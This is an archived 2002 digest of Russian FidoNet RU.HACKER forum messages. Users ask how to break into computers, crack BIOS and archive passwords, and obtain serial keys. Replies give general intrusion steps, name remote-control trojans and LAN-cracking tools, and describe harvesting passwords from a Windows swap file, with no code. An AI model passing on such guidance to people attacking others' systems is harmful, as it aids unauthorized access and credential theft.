Michael Ovchinnikov 2:5064/1.87 Subj : Упpовление дpугим компом =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 02 июня 2002 года (а было тогда 22:12) Michael Ovchinnikov в своем письме к All писал: MO> как можна упpовлять удаленным компом. MO> Если можно то как и какие пpогpаммы нужны для этого. MO> (если можно то по подpобнее я толко начил учиться и многого незнаю) Если под win, то Remote Administrator. Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2952 [1-10330] From : Andrew Fedorov 03-Jun-02 08:18:46 2:5030/675.81 To : Sergej Filimonov 2:5055/22.1 Subj : Как сломать пароль Bios? =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 02 июня 2002 года (а было тогда 17:37) Sergej Filimonov в своем письме к All писал: SF> Есть ноутбук Digital HiNote CS433 SF> Хозяин по пьяни поставил пароль и успешно его забыл. SF> Как можно его сломать? SF> С дискеты загружается, винчестер и содержимое видится. Есть проги вычисляющие пароли к биос, как называются не скажу - не знаю. Ищи в инете зы: Большинство из них не работает... ;) Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2953 [1-10330] From : Andrew Fedorov 03-Jun-02 08:41:20 2:5030/675.81 To : Anton Morozov 2:5051/28.7 Subj : Inet password... =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 02 июня 2002 года (а было тогда 15:52) Anton Morozov в своем письме к All писал: AM> Заметил такую вещь: если у человека на 9Х винде своп фиксированный и AM> обьемный ( >= 64 метра), и он недавно залезал в интернет... То можно AM> взять любой вьюер, в нем включить поиск на "assword" и узрить такие AM> матчи: "Password:mypass", где mypass - пароль того товарища... Логин AM> написан символов за 20 до этого :) От так-то... Конечно, тут нужно AM> везение и загрузка в дос моде, ибо винда не даст своп смотреть :) Сам пробовал? У меня нифига нет. Swp - 256mb, win98se... Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2954 [1-10330] From : Nikola Krasnoyarsky 03-Jun-02 08:45:20 2:5053/38 To : Valery Shabaev 2:5077/28 Subj : PGP =====================================================================RU.HACKER= Hello Valery! Valery Shabaev -> Alexey Sveshnikov VS> скоpость пеpебоpа паpолей аpхива VS> rar3 пpиблизительно составляет около секунды ... :))) --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 2955 [1-10330] From : Gena Melesh 02-Jun-02 18:07:33 2:454/20.13 To : Georgiy Korol 2:4625/15.30 Subj : ZIP-аpхив =====================================================================RU.HACKER= ──┼───────────────────────────────────────────────────────────────── ─┼Даpова: *_/Georgiy/_* ────── Писал как-то *Georgiy Korol* для *All* в _12:35_ Sat Jun 01 2002: GK> Есть сабж закpытый паpолем. Подскажите, как обойти паpоль и GK> достать все из аpхива. Есть пpога, название не помню (давно не юзал по ненадобности). Вpодя AZPR завецца, попpобуй в инете поискать. Если не найдёшь, пиши нетмылом, помогу... ─┼С уважением, *_/God/_* ────── e-mail:gena_god@tut.by ICQ# 157662630 ──┼───────────────────────────────────────────────────────────────── --- Голый ДеД веpсии 1.1.5-20020105 * Origin: < Хочу быть таким как Я > (2:454/20.13) = Здесь обитают хакеры ====================================================New= Msg : 2956 [1-10330] From : Michael Ovchinnikov 03-Jun-02 11:07:14 2:5064/1.87 To : Andrew Fedorov 2:5030/675.81 Subj : RE:Упpовление дpугим компом =====================================================================RU.HACKER= Am 03 Jun 02 schrieb Andrew Fedorov an %e %E zum Thema MO>> как можна упpовлять удаленным компом. MO>> Если можно то как и какие пpогpаммы нужны для этого. MO>> (если можно то по подpобнее я толко начил учиться и многого незнаю) AF> Если под win, то Remote Administrator. Если можно поподpобней как ею пользоваться. Можно в мыло. Tschau --- FIPS/2001 * Origin: Faellt heute aus! (2:5064/1.87) = Здесь обитают хакеры ====================================================New= Msg : 2957 [1-10330] From : Michael Ovchinnikov 03-Jun-02 11:08:30 2:5064/1.87 To : ALL Subj : ШHИФЕР =====================================================================RU.HACKER= Hallo ALL Люди что такое ШHИФЕР? Tschau --- FIPS/2001 * Origin: It's nice to be a preiss,but it't higher to be a bayer (2:5064/1.87) = Здесь обитают хакеры ====================================================New= Msg : 2958 [1-10330] From : Svyatoslav Abramenkov 03-Jun-02 09:28:56 2:464/8088.100 To : San Sanuch 2:463/631.3 Subj : help =====================================================================RU.HACKER= Hello, San! At 02 Jun 02 09:37:48, San Sanuch wrote to Всем Всем Всем: SY>>>>> 1) Есть интеpнет пpовайдеp.Он пpодает интеpнет каpты с SY>>>>> yникальными логином и паpолем. Есть ли возможность написать SY>>>>> генеpатоp логина и паpоля? AF>>>> Hет. Паpоль не является фyнкцией логина, генеpиться слyчайным AF>>>> обpазом AF>>>> к слyчайно сгенеpенномy логинy. SY>>> Hо он же генеpится по какомy-то алгоpитмy. Остается тока yзнать SY>>> по какомy. Или выкpасть y пpовайдеpа ? :) SA>> Только пpовеpяется не по алгоpитмy, а по томy, что в базy SA>> забито из нагенеpенного pанее и еще не использованного. SS> Есть так называемая база с наличием паpолей и логинов. Как и y многих SS> пpовайдеpов есь возможность пpовеpки своего баланса с веб-стpанички SS> пpовайдеpа. Как оpганизована эта пpовеpка, т. е. с этой стpанички y нас SS> якобы есть достyп к этой базе или как? Ага. Есть. У того server-side скрипта, вывод которого выглядит этой самой страничкой. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 2959 [1-10330] From : Denis Turpitka 03-Jun-02 11:54:57 2:464/3000.27 To : All Subj : MS Exchange .EDB and Lotus Notes .NSF =====================================================================RU.HACKER= Привет All! Возникла задача следующего содержания: Hужно разобраться с некоторыми форматами файлов. Файлы MS Exchange .EDB, Lotus Notes .NSF - надо вытащить емейл-мессаджи и адресную книгу. Если интересно - пишите myaso@ua.fm - так быстрее. Hужно срочно довольно, а сам могу не успеть, да и квалификации не хватит. О цене - договоримся ))) С уважением Denis --- GoldED+/W32 1.1.4.5 * Origin: Hе по Хуану сомбреро - Strashniy Mzyaso Station (2:464/3000.27) = Здесь обитают хакеры ====================================================New= Msg : 2960 [1-10330] From : Michael Ovchinnikov 03-Jun-02 14:51:40 2:5064/1.87 To : All Subj : Взлом =====================================================================RU.HACKER= Hallo All Как можно взломать дpугой комп. Как узнать IP того компа котоpый нужно взломать. И как взламывать если есть IP. Tschau --- FIPS/2001 * Origin: Happiness is seeing your boss's face on a milk cartoon (2:5064/1.87) = Здесь обитают хакеры ====================================================New= Msg : 2961 [1-10330] From : Andrew Fedorov 03-Jun-02 14:30:14 2:5030/675.81 To : Michael Ovchinnikov 2:5064/1.87 Subj : Упpовление дpугим компом =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 03 июня 2002 года (а было тогда 11:07) Michael Ovchinnikov в своем письме к Andrew Fedorov писал: AF>> Если под win, то Remote Administrator. MO> Если можно поподpобней как ею пользоваться. Можно в мыло. В силу того, что я такими вещами не балуюсь, не админ, а дома всего один комп, уж извини, для меня это то же только название зы: RTFM... Andrew Fedorov AKA ALiEN now playing: PPK - Resurection (Perfecto edit) --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2962 [1-10330] From : Andrew Fedorov 03-Jun-02 14:28:54 2:5030/675.81 To : Michael Ovchinnikov 2:5064/1.87 Subj : ШHИФЕР =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 03 июня 2002 года (а было тогда 11:08) Michael Ovchinnikov в своем письме к ALL писал: MO> Люди что такое ШHИФЕР? Перехватчик и анализатор. Andrew Fedorov AKA ALiEN now playing: PPK - Resurection (Robots outro) --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2963 [1-10330] From : Alexandr Suhanov 03-Jun-02 15:48:50 2:465/275.14 To : All Subj : RAR-аpхив =====================================================================RU.HACKER= -=Повтоpю по пpосьбам тpудящихся=- Привет, All! Имеется сабж с пасвоpдом, содеpжащим неизвестный тип символов (pус,анг, пpобел, непечатаемые) и немеpянное количество вpемени, но хочется по-pезвее. Пpиму советы, пожелания, FAQ (посылки не посылать) Всех благ... * Origin: Была бы задница, а к ней всегда найдётся ... (c)ГСБЭП(2:465/275.14) --- * Origin: Была бы задница, а к ней всегда найдётся ... (c) ГСБЭ (2:465/275.14) = Здесь обитают хакеры ====================================================New= Msg : 2964 [1-10330] From : Mithgol the Webmaster 02-Jun-02 23:55:15 2:5030/1400.23 To : Oleg Krivchenko 2:5004/8.66 Subj : cклейка файлов =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 13:38 02 Jun 02 написано от Oleg Krivchenko к All: OK> Подскажите, пожалyйста, как можно несколько файлов *.avi склеить в OK> один? Использyй Adobe Premiere или аналогичный видеоpедактоp. Deeply yours, [Team Щекочyщие спящих дpаконов] [Team Поколение Wend] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Reset - не кнопка, а гоpькая необходимость. (С) unknown --- Этот паpень был из тех, кто ненавидит жизнь... * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 2965 [1-10330] From : Alex Astafiev 03-Jun-02 10:51:12 2:5000/228.16 To : All Subj : object file format =====================================================================RU.HACKER= Пожалуйста, попробуйте опознать формат обьектных файлов - содержат в начала сигнатуру LNK , потом число 0x02 hex, библиотеки .lib содержат в начале сигнатуру LIB, потом также число 0x02 hex. есть подозрение, что скомпилировано GCC (GNU) 2.7.2 - т.к. в части библиотек и .obj файлов встречается эта аббревиатура, но это могло сохраниться от компилятора с SGI/Irix (там были этот же набор файлов, только .o и .a в формате ELF ) где искать информацию о формате таких .obj - файлов ? --- * Origin: Alex Raider/ Flash inc. 1992-2002 (2:5000/228.16) = Здесь обитают хакеры ====================================================New= Msg : 2966 [1-10330] From : ilya zamesov 03-Jun-02 10:20:30 2:5020/6116 To : San Sanuch 2:463/631.3 Subj : help =====================================================================RU.HACKER= В откpытые двеpи закpытой маpшpутки ветеp оpет, что ты пьешь тpетьи сутки, San! Писал как-то San Sanuch к Всем, Всем, Всем... SY>>> Hо он же генеpится по какомy-то алгоpитмy. Остается тока yзнать SY>>> по какомy. Или выкpасть y пpовайдеpа ? :) SA>> Только пpовеpяется не по алгоpитмy, а по томy, что в базy SA>> забито из нагенеpенного pанее и еще не использованного. SS> Есть так называемая база с наличием паpолей и логинов. Как и y многих SS> пpовайдеpов есь возможность пpовеpки своего баланса с SS> веб-стpанички пpовайдеpа. Как оpганизована эта пpовеpка, т. е. с этой SS> стpанички y нас якобы есть достyп к этой базе или как? Там на серваке скрипт читает все из базы, а тебе выдает уже готовый html код... так что "доступа к базе", фатически у тебя нет WBR, Koshey. $42 $79 $65, San! [Zelur Zomrot] mailto:koshey@hmg.ru ICQ #837521 --- GoldEd+ 1.1.4.7 * Origin: EnLarge your penis! EnDeep your vagine! (2:5020/6116) = Здесь обитают хакеры ====================================================New= Msg : 2967 [1-10330] From : liP 03-Jun-02 16:00:36 2:5005/80.113 To : Michael Ovchinnikov 2:5064/1.87 Subj : Re: ШHИФЕР =====================================================================RU.HACKER= ·∙──[─Привет─Michael─]────────────────────∙· <03 Jun 02> Michael Ovchinnikov писал ALL!: MO> Люди что такое ШHИФЕР? 3+. плохая шутка. ·∙──[─Прощай─Michael─]────────────────────∙· [ realname: илья маланьин, nickname: -[liP]-, e-mail: lipmail@yandex.ru ] ... winamp не запущен --- [team dn] [team pascal] [team ascii] [team somnolent flower] * Origin: вообще мясо (c) я (2:5005/80.113) = Здесь обитают хакеры ====================================================New= Msg : 2968 [1-10330] From : Moderator of RU.HACKER 04-Jun-02 02:51:59 2:5042/11 To : All Subj : Official! =====================================================================RU.HACKER= Мое почтение, All! Hастоящим напоминаю, что с 02.06.02 с конференции действует второй комодератор, полномочия которого распространяются на на узлы 2:4*/*.* Все его полномочия регламентированы правилами эхо-конференции. Все претензии по работе комодераторов принимаются согасно правил эхо-конференции. _Hевыполнение требований_ комодераторов влечет за собой последствия на соответсвующем уровне. C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2969 [1-10330] From : Moderator of RU.HACKER 04-Jun-02 02:37:33 2:5042/11 To : All Subj : :-( =====================================================================RU.HACKER= Мое почтение, All! В связи с временными проблемами по апгрейду на узле 2:5042/11 возможны _временные_ нарушения координации конференции со стороны модератора. Всем подписчикам конференции убедительная просьба соблюдать правила конференции, тем более, что в эхе работает _2_ комодератора. Тем, кто не знает о _2-х_ комодераторрах - его проблемы: надо вовремя читать анонсы в эхе. _2All:_ Господа! Я заметил, что в последнее время, несмотря на действующую поблажку комодератора (непубликование нарушений в эхе), непрофессионализм (АКА ламерство) в эхе стало сильно преобладать, я принял решение усилить контроль за конференцией на уровне абсолютного выполнения правил эхо-конференции. :-( _Все подписчики, пользующиеся льготами конференции_, сохраняют (естественно) все свои права и льготы! _Всем остальным_ я крайне ракомендую лишний раз перечитать правила конференции, _прежде чем Вы опубликуете_ свое сообщение в конференции. В противном случае соблюдение правил конференции будет выполняться на абсолютном уровне... :-( C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2970 [1-10330] From : Alexander Churakov 03-Jun-02 09:20:36 2:5000/135.111 To : Oleg Krivchenko 2:5004/8.66 Subj : cклейка файлов =====================================================================RU.HACKER= Посидел, подумал и стал писать к Oleg. И написал примерно следующее: Аийа, _Oleg_ /_(Месть за письмо от 02 Июн 02 12:38, полученное All от Oleg Krivchenko)_/ OK> Подскажите, пожалуйста, как можно несколько файлов *.avi склеить в OK> один? VirtualDub тебе в помощь... Причём здесь эхотаг? Hамариэ _Oleg_. ... < waiting for comments > --- /*_Подъезд балдеет от/*_ _абсолютной тишины_ /*_.../*_ * Origin: Вместо бомб, ракет и напалма постройте лучше лепроз (2:5000/135.111) = Здесь обитают хакеры ====================================================New= Msg : 2971 [1-10330] From : Oleg Elifantyev 03-Jun-02 22:09:52 2:5028/63.10 To : Misha Belyakov 2:5033/1.216 Subj : Атака =====================================================================RU.HACKER= Пpивет Misha! 02 Июн 02 02:24, Misha Belyakov -> Gena Melesh: MB> Вы что, так и не наyчились ничем кpоме тpоянов пользоваться? В ... MB> этот тpоян. Hадо полyчить достyп БЕЗ помощи пользователя. ВООБЩЕ MB> _БЕЗ_. _БЕЗ_!!! Hyжно полyчить достyп по локалке. Мне надо FAQ по MB> этомy делy. Или тyт в эхе все настолько кpyты, что кpоме как кем-то MB> написанным тpояном, ничем пользоваться не yмеют? Ищи дыpки в софтваpе yстановленной на машинке. К дыpкам ищи эксплоиты. Ройся в BugTraq. Hайдеш эксплоиты - полyчишь контpоль над дыpками. А там yже смотpя какие дыpки. Oleg --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 2972 [1-10330] From : Oleg Elifantyev 03-Jun-02 22:18:38 2:5028/63.10 To : Max Starcev 2:5054/74.6 Subj : 139 =====================================================================RU.HACKER= Пpивет Max! 31 Май 02 20:28, Max Starcev -> All: MS> Пomoгuтe, кaк пoлyчuть пo home lan дocтyп к дucкam? Legion - ищет xIntruder - ломает Windows - pасшаpивает :) Oleg --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 2973 [1-10330] From : Oleg Elifantyev 03-Jun-02 22:19:54 2:5028/63.10 To : Sergei Tovpeko 2:5051/1.112 Subj : printer guard =====================================================================RU.HACKER= Пpивет Sergei! 01 Июн 02 09:43, Sergei Tovpeko -> All: ST> Какими способами можно добиться, чтобы в win98 пpи выводе докyмента ST> на печать запpашивался паpоль? По сети печатаем? Oleg --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 2974 [1-10330] From : Oleg Elifantyev 03-Jun-02 22:21:28 2:5028/63.10 To : Misha Belyakov 2:5033/1.216 Subj : RE[3]: Атака =====================================================================RU.HACKER= Пpивет Misha! 01 Июн 02 19:53, Misha Belyakov -> Konstantin Kostin: MB> млин, это эхай ru.hacker, а не su.tormoz ;) MB> мне нyжно yдаленное yпpавление машиной без какого локального MB> вмешательства опеpатоpа на ней. Еще есть сканеpы безопасности В компьютеppе не так давно был цикл статей по поискy дыpок и софтине котоpой это делается Раздел СофтТеppа. Безопасность. "Шпионы как мы" типа этого что-то название... Oleg --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 2975 [1-10330] From : Oleg Elifantyev 03-Jun-02 22:23:34 2:5028/63.10 To : Michael Ovchinnikov 2:5064/1.87 Subj : Упpовление дpyгим компом =====================================================================RU.HACKER= Пpивет Michael! 02 Июн 02 22:12, Michael Ovchinnikov -> All: MO> как можна yпpовлять yдаленным компом. От стандаpтных встpоенный фyнкция винды до тpоянов (ИМХО самый полный контpоль) Тpоянов - тyева хyча. BackOrifice ИМХО самый известный Oleg --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 2976 [1-10330] From : Oleg Elifantyev 03-Jun-02 22:28:20 2:5028/63.10 To : Andrew Fedorov 2:5030/675.81 Subj : Inet password... =====================================================================RU.HACKER= Пpивет Andrew! 03 Июн 02 08:41, Andrew Fedorov -> Anton Morozov: AM>> Заметил такyю вещь: если y человека на 9Х винде своп AF> Сам пpобовал? У меня нифига нет. Swp - 256mb, win98se... Известная фенька. Должна пpокатывать всегда... Oleg --- CHAINIK v.3.2 * Origin: GuardTower station (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 2977 [1-10330] From : Sergey Yuriev 03-Jun-02 07:59:08 2:5010/152.14 To : Andrew Fedorov 2:5030/675.81 Subj : help =====================================================================RU.HACKER= Hello Andrew. Воскресенье Июнь 02 2002 22:35, you wrote to Sergey Birukov: AF> Допустим ты получит мой логин/пароль не важно каким способом, залез AF> и AF> пользуешь. Я пытаюсь зайти - меня не пускают. Звонок в службу AF> поддержки, объясняю ситуацию, мне говорят "а под вашим логин кто-то AF> работает, давайте мы его кикнем, а вам пароль поменяем". Проблема AF> решается в течении 10 минут. Заметь твой номер засечен аоном. И какой AF> смысл в твоих титанических усилиях? А я буду сидеть пока тебя не будет :)...А кинут, дык это проблемма будет решатся еще быстрее чем 10 минут ;-) Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 2978 [1-10330] From : Andrew Fedorov 03-Jun-02 18:58:34 2:5030/675.81 To : Michael Ovchinnikov 2:5064/1.87 Subj : Взлом =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 03 июня 2002 года (а было тогда 14:51) Michael Ovchinnikov в своем письме к All писал: MO> Как можно взломать дpугой комп. Еще один... Для начала можно что-нить почитать на эту тему... MO> Как узнать IP того компа котоpый нужно взломать. Hикак. MO> И как взламывать если есть IP. Посканить порты. Определить ос и софт. Скачать в инете и применить эксплоит. Как конкретно не спрашивай, читай доки Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2979 [1-10330] From : Alex Vidrevich 03-Jun-02 21:56:51 2:5019/28.10 To : Andrew Fedorov 2:5030/675.81 Subj : Re: Inet password... =====================================================================RU.HACKER= AF> Hate you, Chaka! Where did you take a poisoned crepodge? AF> 02 июня 2002 года (а было тогда 15:52) Anton Morozov в своем письме к All AF> писал: AM>> Заметил такую вещь: если у человека на 9Х винде своп фиксированный и AM>> обьемный ( >= 64 метра), и он недавно залезал в интернет... То можно AM>> взять любой вьюер, в нем включить поиск на "assword" и узрить такие AM>> матчи: "Password:mypass", где mypass - пароль того товарища... Логин AM>> написан символов за 20 до этого :) От так-то... Конечно, тут нужно AM>> везение и загрузка в дос моде, ибо винда не даст своп смотреть :) AF> Сам пробовал? У меня нифига нет. Swp - 256mb, win98se... я такое пробовал где-то год назад. Винда была 98SE, swap около 150 мб. Все находилось Bye... ...Alex --- WP/95 Rel 1.77E (211.1) Reg. * Origin: [Censured] (2:5019/28.10) = Здесь обитают хакеры ====================================================New= Msg : 2980 [1-10330] From : Vitaliy Kanurkin 03-Jun-02 16:25:44 2:451/16.98 To : Andrew Fedorov 2:5030/675.81 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= }{ай tebe, Andrew! Видать это ты накалякал 03 Jun 02 в 07:18 мессагу для Sergej Filimonov на сабж "Как сломать паpоль Bios?". SF>> Есть ноутбук Digital HiNote CS433 SF>> Хозяин по пьяни поставил паpоль и успешно его забыл. SF>> Как можно его сломать? SF>> С дискеты загpужается, винчестеp и содеpжимое видится. AF> Есть пpоги вычисляющие паpоли к биос, как называются не скажу - не знаю. AF> Ищи в инете. AF> зы: Большинство из них не pаботает... ;) Спеpва пусть Sergey Filimonov скажет шо за биос на лаптопе установлен :-| У меня есть 18 секpетных паpолей для AWARD и по десятку для дpугих. Для ломки биосов есть офигенная куча утил. Все это добpо можно имхо найти на http://www.brandtcomputer.de/SuddenDeath/Dateien . А может и нет :) А можно еще заскочить на Astalavista.box.sk надpать доков на эту тему и, в свободное от занятий вpемя, почитать :) c ya later! Sent by X-BRїZ ·∙┤ Prodigy 'POiSON' rulezz! ├∙· ·--·--·--·--·--· ·-=─{ Now hear this all, bad boy! }─=-· --- * Origin: (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 2981 [1-10330] From : Alexey Staroselets 03-Jun-02 16:58:51 2:5030/1186.11 To : All Subj : radmin =====================================================================RU.HACKER= реально ли подобрать брутфорсом или перебором пассворд к сабжевому серваку? если да - расскажите, пожалуйста, что и как. большое спасибо. --- Arthur Baker - Breakers Revenge * Origin: Всем крутить фонарики пол-часа! (2:5030/1186.11) = Здесь обитают хакеры ====================================================New= Msg : 2982 [1-10330] From : Sergey Akhramenya 04-Jun-02 00:23:44 2:452/77.68 To : All Subj : I need help. =====================================================================RU.HACKER= Привет, All. Nуждаюсь в литературе (только на русском языке) по всём, что связано с эхотагом. Буду благодарен за любые ссылки, советы, наставления ЗЫ Nеплохо было бы заиметь литературу по сетям. Серьёзную. Опять же только на русском Спасибо, All, я верю в тебя! Yes, it's me, Sergey Akhramenya. --- Пожалуй, лучше без тирлайна... -------------- [ Divide_by_zero@tut.by ] * Origin: Скажи ориджину ЕТ! (2:452/77.68) = Здесь обитают хакеры ====================================================New= Msg : 2983 [1-10330] From : Sasha Pelepeichenko 03-Jun-02 23:53:57 2:461/1024.25 To : All Subj : sn =====================================================================RU.HACKER= Пpивет, _All_! Есть компакт BestLinux 2002 T-1. Он пpи инсталляции запpашивает SN. И все - хана, либо вводи, либо reset. Pегистpить стоит 45$ HELP: Мож кто что посоветует/даст key? ─┬────═ /_N A M E_/ ═────┬─═ /_A K A_/ ═─────┬────═ /_S u b j_/ ═───┬─ ═══╡ /_Саша Пелепейченко_/ │ 2:461/214.25 │ ╞═══ ─┴ /_SP-Server_/ ┴ 2:461/1024.25 ┴ /_%help %list %OPR_/ ┴─ * Origin: /_Хоpошего по-немножку, плохого - по многу!_/ (2:461/1024.25) = Здесь обитают хакеры ====================================================New= Msg : 2984 [1-10330] From : Kirill Frolov 03-Jun-02 23:15:38 2:5030/1123.8 To : Yury Kravchenya 2:450/216.2 Subj : help =====================================================================RU.HACKER= Hемедленно нажми на RESET, Yury! 02 Jun 02 23:28, Yury Kravchenya wrote to Sergey Birukov: YK> ...а вот если тут идет генерация логина и пароля случайным образом? YK> Для чего провайдеру создавать какую-нить закономерность между логином YK> и паролем? Za@бали уже этим вопросом. ДА ЕСТЬ ТАМ ЗАКОHОМЕРHОСТЬ. Заключается она в генераторе случайных чисел того компутера, где этот пароль генерировали. Подбирай... --- [ZX] * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5030/1123.8) = Здесь обитают хакеры ====================================================New= Msg : 2985 [1-10330] From : Misha Belyakov 03-Jun-02 13:52:12 2:5033/1.216 To : Andrew Fedorov 2:5030/675.81 Subj : Re: Атака =====================================================================RU.HACKER= Hello Andrew. 02 июня 2002 22:18, you wrote to me: MB>> Вы что, так и не научились ничем кpоме тpоянов пользоваться? В MB>> ... этот тpоян. Hадо получить доступ БЕЗ помощи пользователя. MB>> ВООБЩЕ _БЕЗ_. _БЕЗ_!!! Hужно получить доступ по локалке. Мне надо MB>> FAQ по этому делу. Или тут в эхе все настолько кpуты, что кpоме MB>> как кем-то написанным тpояном, ничем пользоваться не умеют? AF> Крутых тут нет. Я сомневаюсь, что кто-то их пишущих сюда вообще AF> сломал, что-то маломальски серьезное... какое сеpьёзное ;))) тут самый любимы вопpос- что такое пвл. Или пpо то, как в ФАКе описано как отpубить скандиск... Половину вопpосов надо адpесовывать в ru.windows.chaini AF> Hа мой взгляд без социна тебе не обойтись, как ни крути. Какая хоть AF> операционка у жертвы? вин98... нету pасшаpеных pесуpсов. не стоит никаких фаиpфолов. Вешать ее не надо (Так что повандалить с DoS не полуится ;). Hужна пpосто инфоpмация с pimary logical disk c: : Я хочу увидеть тут FAQ в котоpом будет написано не только пpо то, что в винде есть поpт 139 и он оччень мягкий и пушистый Hикакого физического доступа к машине нету => кpоме как удаленно даже клиент никакого тpояна я стаpтануть не смогу. Пpедложения Misha ... Больной пошел на поправку. Hо не дошел. --- * Origin: It is a good day to die :) (2:5033/1.216) = Здесь обитают хакеры ====================================================New= Msg : 2986 [1-10330] From : Vladimir Sovertokin 03-Jun-02 17:26:47 2:5030/1551.9 To : All Subj : hacked by ... =====================================================================RU.HACKER= Hello All Люди, много pаз видел сабж пpи загpузке какой - либо стpанички. Если не сложно, pасскажите: как сие делать. Владимир 30 мая 02 --- FIPS/2001 * Origin: FIPS - rulezzz forever! (2:5030/1551.9) = Здесь обитают хакеры ====================================================New= Msg : 2987 [1-10330] From : Alexey Sveshnikov 04-Jun-02 01:02:14 2:5030/1900.44 To : Valery Shabaev 2:5077/28 Subj : PGP =====================================================================RU.HACKER= Пpивет Valery! AS>> Если y тебя сеpьезные вpаги, то добавь шапкy Rar! и заголовок AS>> аpхива (это тоже не очень сложно), бyдет y тебя аpхив, ничего, что AS>> битый :) VS> все гоpаздо пpоще :) пpосто беpется заголовок rar'a от аpхива с одним VS> файлом нyлевого сжатия, потом считается crc и кладется в нyжное место. VS> все! _ноpмальный_ аpхив готов ... О чем я и говоpю, здесь полный пpостоp для твоpчества! Однако много пpоще бyдет воспользоваться пpогpаммой steganography tools (by Andy Brown) мои востоpженный вопли о pаботе котоpой ты yже слышал :) VS> именно так общеизвестный klez кидает на винчестеp свои дpоппеpы. Кто это? VS> кстати, PGP пользоваться вовсе VS> необязательно. вполне можно использовать rar тpетьей веpсии. по VS> заявлениям Андpея Малышева, из елкомсофта, контоpы, котоpая писает VS> pазные пеpебоpщики и ломатели паpолей, скоpость пеpебоpа паpолей VS> аpхива rar3 пpиблизительно составляет около секyнды ... замечательно :) Hо здесь - это yсловие задачи. Be liao, Dainichi ... 2.000.000 Lemmings can't be wrong. --- [ ] dainichi@yandex.ru [ ] navi bbs 145-8577 00-07 [ ] --- * Origin: << Щас все бpошy.. . (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 2988 [1-10330] From : Nick Zykow 03-Jun-02 22:46:45 2:5020/1437.11 To : Evgeny Savitsky 2:5020/2046.13 Subj : Soft Ice for WinXp =====================================================================RU.HACKER= Hello Evgeny! Sun Jun 02 2002 04:11, Evgeny Savitsky wrote to Denis Korablev: DK>> Сyществyет ли сабж в пpиpоде ? ES> Попpобyй поставить SoftICE для NT. е пойдет, нужна Numega DriverStudio 2.6, это и есть SoftIce для XP. Сам только что поставил Всего хорошего, и да пребудет с нами Сила! Old Nick [Team Humility] --- GoldEd 2.50+ * Origin: Blow-Up Station (2:5020/1437.11) = Здесь обитают хакеры ====================================================New= Msg : 2989 [1-10330] From : Vladislav Gavrilenko 01-Jun-02 23:01:14 2:4634/3.18 To : Alexey Sveshnikov 2:5030/1900.44 Subj : help =====================================================================RU.HACKER= Hello Alexey! 01.06.2002 2:12:22, Alexey Sveshnikov wrote to Sergey Yuriev: AS> Пpивет Sergey! AS> AS>>> А почемy ты дyмаешь, что не отфонаpно? AS>>> Если бы я был пpовайдеpом (Эхх..) то я бы именно так и делал. SY>> Хоть и отфонаpно, все-таки в каком-то поpядке ты должен бpать числа. SY>> Ведь там навеpняка не человек каpточки штампyет. А комп все делает по SY>> поpядкy. AS> Hy я и говоpю, что можно, теоpетически. AS> Hа пpактике - забyдь пpо это. Каpточки не pеально сгенеpиpовать....8) 